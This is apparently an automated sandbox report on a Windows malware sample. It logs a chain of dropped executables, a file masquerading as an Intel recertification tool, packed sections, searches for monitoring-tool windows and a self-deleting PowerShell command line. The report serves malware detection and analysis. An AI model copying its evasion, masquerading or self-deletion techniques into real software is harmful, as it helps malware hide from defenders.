Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winrnr.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Section loaded: schannel.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: file.exe Static file information: File size 2969600 > 1048576
Source: file.exe Static PE information: Raw size of oadzzmvp is bigger than: 0x100000 < 0x2a3600
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Unpacked PE file: 32.2.b2885fa695.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Unpacked PE file: 42.2.b7c03317c9.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pfkrromk:EW;hghjijlv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pfkrromk:EW;hghjijlv:EW;.taggant:EW;
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Binary contains a suspicious time stamp
Source: random[2].exe1.5.dr Static PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 6_2_00402665
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: b7c03317c9.exe.5.dr Static PE information: real checksum: 0x445664 should be: 0x4486a1
Source: Gxtuum.exe.36.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: random[2].exe0.5.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: b2885fa695.exe.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: 4115805b10.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 7z.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: 7z.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: random[1].exe2.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: Intel_PTT_EK_Recertification.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: in.exe.18.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: graph.exe.39.dr Static PE information: real checksum: 0x0 should be: 0x46f82
Source: 4cdf81e042.exe.5.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: random[2].exe1.5.dr Static PE information: real checksum: 0x0 should be: 0x14b59
Source: file.exe Static PE information: real checksum: 0x2db94a should be: 0x2e37b5
Source: skotes.exe.0.dr Static PE information: real checksum: 0x2db94a should be: 0x2e37b5
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 72f44ceb0a.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: random[2].exe.5.dr Static PE information: real checksum: 0x445664 should be: 0x4486a1
Source: 322c3dce5b.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x14b59
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: oadzzmvp
Source: file.exe Static PE information: section name: ccijuplx
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: oadzzmvp
Source: skotes.exe.0.dr Static PE information: section name: ccijuplx
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: pfkrromk
Source: random[2].exe.5.dr Static PE information: section name: hghjijlv
Source: random[2].exe.5.dr Static PE information: section name: .taggant
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: .idata
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: pfkrromk
Source: b7c03317c9.exe.5.dr Static PE information: section name: hghjijlv
Source: b7c03317c9.exe.5.dr Static PE information: section name: .taggant
Source: random[2].exe0.5.dr Static PE information: section name: .eh_fram
Source: 4cdf81e042.exe.5.dr Static PE information: section name: .eh_fram
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: .idata
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: wekcazbo
Source: random[1].exe2.5.dr Static PE information: section name: ttllozcv
Source: random[1].exe2.5.dr Static PE information: section name: .taggant
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: .idata
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: wekcazbo
Source: b2885fa695.exe.5.dr Static PE information: section name: ttllozcv
Source: b2885fa695.exe.5.dr Static PE information: section name: .taggant
Source: in.exe.18.dr Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.20.dr Static PE information: section name: UPX2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0D91C push ecx; ret 0_2_00B0D92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01359 push es; ret 0_2_00B0135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0016D91C push ecx; ret 1_2_0016D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001A0168 push es; retf 0004h 5_2_001A022E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016D91C push ecx; ret 5_2_0016D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018DEDB push ss; iretd 5_2_0018DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016DFC6 push ecx; ret 5_2_0016DFD9
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004192C0 push eax; ret 6_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA676A push rcx; ret 10_2_00CA676B
Source: file.exe Static PE information: section name: entropy: 7.983040046559541
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.983040046559541
Source: random[2].exe.5.dr Static PE information: section name: pfkrromk entropy: 7.954681489515957
Source: b7c03317c9.exe.5.dr Static PE information: section name: pfkrromk entropy: 7.954681489515957
Source: random[1].exe2.5.dr Static PE information: section name: entropy: 7.980952558000639
Source: random[1].exe2.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: b2885fa695.exe.5.dr Static PE information: section name: entropy: 7.980952558000639
Source: b2885fa695.exe.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\main\in.exe File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Program Files\Windows Media Player\graph\graph.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: RegmonClass
